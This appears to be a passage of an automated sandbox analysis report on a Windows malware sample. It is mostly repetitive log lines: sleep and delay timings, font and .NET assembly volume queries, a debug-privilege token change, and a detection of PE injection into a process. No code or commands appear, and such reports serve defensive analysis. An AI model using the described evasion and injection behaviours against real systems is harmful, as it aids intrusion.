          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -239766s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -239641s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -239516s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -239405s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -239297s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -239188s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -239063s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -238938s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -238828s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -238716s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -238608s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5772Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -238500s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -238391s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 5300Thread sleep time: -238200s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 1720Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep count: 38 > 30Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -35048813740048126s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7308Thread sleep count: 3260 > 30Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -599874s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7308Thread sleep count: 6570 > 30Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -599749s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -599641s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -599526s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -599406s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -599281s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -599109s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -598875s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -598718s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -598609s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -598500s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -598390s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -598281s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -598169s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -598047s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -597937s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -597824s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -597703s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -597594s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -597483s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -597375s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -597265s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -597156s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -597047s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -596937s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -596827s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -596719s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -596609s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -596498s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -596387s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -596274s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -596159s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -596040s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -595907s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -595735s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -595609s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -595500s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -595389s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -595266s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -595156s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -595024s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -594906s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -594797s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -594687s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -594578s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -594469s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -594359s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -594250s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -594140s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -594031s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe TID: 7276Thread sleep time: -593922s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 240000Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 239874Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 239766Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 239641Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 239516Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 239405Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 239297Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 239188Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 239063Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 238938Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 238828Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 238716Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 238608Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 30000Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 238500Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 238391Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 238200Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 599874Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 599749Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 599641Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 599526Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 599406Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 599281Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 599109Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 598875Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 598718Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 598609Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 598500Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 598390Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 598281Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 598169Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 598047Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597937Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597824Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597703Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597594Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597483Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597375Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597265Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597156Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 597047Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596937Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596827Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596719Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596609Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596498Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596387Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596274Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596159Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 596040Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595907Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595735Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595609Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595500Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595389Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595266Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595156Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 595024Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594906Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594797Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594687Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594578Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594469Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594359Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594250Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594140Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 594031Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeThread delayed: delay time: 593922Jump to behavior
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000029F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^qEmultipart/form-data; boundary=------------------------8dd5132f24c205a<
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4165444281.0000000000B57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
